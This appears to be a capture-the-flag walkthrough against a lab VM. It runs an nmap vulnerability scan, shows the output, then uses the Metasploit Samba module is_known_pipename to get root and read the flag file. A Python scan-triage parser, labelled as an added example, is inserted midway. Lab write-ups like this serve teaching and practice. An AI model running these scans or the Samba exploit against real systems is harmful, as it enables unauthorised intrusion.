Let's find the target's IP first with nmap:
nmap 192.168.18.0/24
The IP is 192.168.18.85
Let's run an extended scan to enumerate the services and their versions, together with a basic vulnerability scan using nmap's vuln scripts.
root@kali:~# nmap -sV -O -A -T5 --script vuln 192.168.18.85
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-10 04:00 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.18.85
Host is up (0.00064s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
53/tcp open domain dnsmasq 2.75
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:thekelleys:dnsmasq:2.75:
| CVE-2019-14513 5.0 https://vulners.com/cve/CVE-2019-14513
|_ CVE-2019-14834 4.3 https://vulners.com/cve/CVE-2019-14834
80/tcp open http PHP cli server 5.5 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp open doom?
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
MAC Address: 08:00:27:EC:EF:56 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.64 ms 192.168.18.85
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 565.32 seconds
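Before moving on, here is an added example (not part of the original walkthrough) of how a defender would triage scan output like the one above: a small Python parser for nmap's normal output that attaches each port's NSE script findings (CVE references and VULNERABLE states) to the port line they belong to. The sample input is a constructed, trimmed copy of the scan above.

```python
import re

# Constructed sample input: a trimmed copy of the nmap normal-format output above.
SAMPLE = """\
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
53/tcp open domain dnsmasq 2.75
| vulners:
| CVE-2019-14513 5.0 https://vulners.com/cve/CVE-2019-14513
|_ CVE-2019-14834 4.3 https://vulners.com/cve/CVE-2019-14834
80/tcp open http PHP cli server 5.5 or later
| http-slowloris-check:
| VULNERABLE:
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp open doom?
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
"""

# A port line: "<port>/<proto> <state> <service> [version...]"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")

def parse_nmap(text):
    """Parse nmap normal output into one dict per port, with NSE findings attached."""
    ports, current = [], None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {"port": int(m.group(1)), "proto": m.group(2),
                       "state": m.group(3), "service": m.group(4),
                       "version": m.group(5).strip(), "cves": [], "vulnerable": False}
            ports.append(current)
        elif current is not None and line.startswith("|"):
            # NSE script output is prefixed with '|' under the port it belongs to.
            for cve in CVE_RE.findall(line):
                if cve not in current["cves"]:
                    current["cves"].append(cve)
            if "VULNERABLE" in line and "NOT VULNERABLE" not in line:
                current["vulnerable"] = True
    return ports

def triage(ports):
    """Open ports that a script flagged as vulnerable or tied to a CVE."""
    return [p for p in ports if p["state"] == "open" and (p["vulnerable"] or p["cves"])]
```

On this sample, triage(parse_nmap(SAMPLE)) returns only the dnsmasq (53) and PHP (80) entries; the Samba port that the walkthrough goes after next carries no script finding at all, a reminder that an empty vuln-script result is not a clean bill of health.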
I didn't find anything interesting on the port 80 web page, nor in the nikto and gobuster scans.
Samba is running on port 139. Let's try to exploit it before moving on to FTP.
msfconsole
msf5 > use exploit/linux/samba/is_known_pipename
Now set the module options.
Time to run the exploit: enter run.
We got root. Now let's read the flag.
cat /root/flag.txt
Finished! That's all for today.